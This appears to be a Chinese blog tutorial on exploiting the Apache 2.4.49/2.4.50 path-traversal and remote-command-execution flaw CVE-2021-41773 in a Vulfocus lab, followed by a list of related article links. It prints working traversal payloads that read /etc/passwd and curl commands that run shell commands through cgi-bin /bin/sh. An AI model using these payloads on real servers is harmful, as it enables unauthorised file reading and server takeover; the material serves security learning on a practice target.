中间件安全(三)

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

前言:

本文主要讲解apache命令执行漏洞(cve_2021_41773)。

靶场链接:Vulfocus 漏洞威胁分析平台

一,漏洞简介。

cve_2021_41773漏洞是一个目录穿越的高危漏洞,主要影响版本有:Apache(阿帕奇) 2.4.49 和 Apache 2.4.50;其对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

二,poc。

具体poc已给出:

get传参方式poc为:

复制代码
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

可以看到是一段经过了url编码的内容,解密后为:

2,post传参:

复制代码
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

经过两次url解码后,结果为:

三,漏洞利用。

打开靶场连接后,可以发现是一个阿帕奇服务的默认界面。

通过抓包后发现,传参方式为get:

此处使用get传参的poc。

进行攻击测试(poc填写到红框内):

可以看到,回显为修改请求头所读的敏感信息。

此处为什么要用burp,因为浏览器自动对路径进行了一次url解码,用burp发送过去的请求,不会被自动解码

‍四,rce。

1,查看敏感文件。

在kali上使用curl 命令进⾏进一步渗透工作。

读取敏感文件的命令为:

复制代码
 curl -v --path-as-is http://[ip]:port/icons/.%%32%65/%%32%65%%32%65/%%32%6
 5%%32%65/%%32%65%%32%65/etc/passwd

① [ip] 替换成被攻击服务器的 IP。

② port 替换为被攻击服务器端⼝。

curl简介:Linux命令行工具:curl详解(与服务器之间传输数据)_curl socks5代理-CSDN博客

2,通用操作。

具体格式为:

复制代码
 curl --data "echo;shell" http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/
 sh 

替换shell为想要执行的命令。

取得敏感信息,查询一下当前用户:

复制代码
 curl --data "echo;whoami" http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/
 sh 

查看一下当前目录:

复制代码
 curl --data "echo;pwd"  http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh       

获取flag:

复制代码
curl --data  "echo;ls /tmp"   http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 
相关推荐
德福危险1 天前
密码枚举的艺术:靶机练习之midwest
服务器·安全·web安全
cdprinter1 天前
信刻——安全生产音视频录音录像自动刻录备份归档管理系统
安全·自动化·音视频
嘉里蓝海1 天前
橙色风暴中的安全守卫者——嘉顺达蓝海的危险品运输启示录
安全
Blossom.1181 天前
把AI“刻”进玻璃:基于飞秒激光量子缺陷的随机数生成器与边缘安全实战
人工智能·python·单片机·深度学习·神经网络·安全·机器学习
wanhengidc1 天前
云手机的安全保护措施有哪些?
运维·服务器·安全·游戏·智能手机·云计算
岛屿旅人1 天前
智库报告美国如何打网络战
网络·人工智能·安全·web安全
newxtc2 天前
【广州公共资源交易-注册安全分析报告-无验证方式导致安全隐患】
开发语言·selenium·安全·yolo
网安INF2 天前
网络攻防技术:拒绝服务攻击
网络·安全·web安全·网络安全
躺平的赶海人2 天前
C# Dictionary 线程安全指南:多线程下操作 Dictionary<string, DateTime> 的加锁策略
java·安全·c#
GIS数据转换器2 天前
2025无人机在农业生态中的应用实践
大数据·网络·人工智能·安全·无人机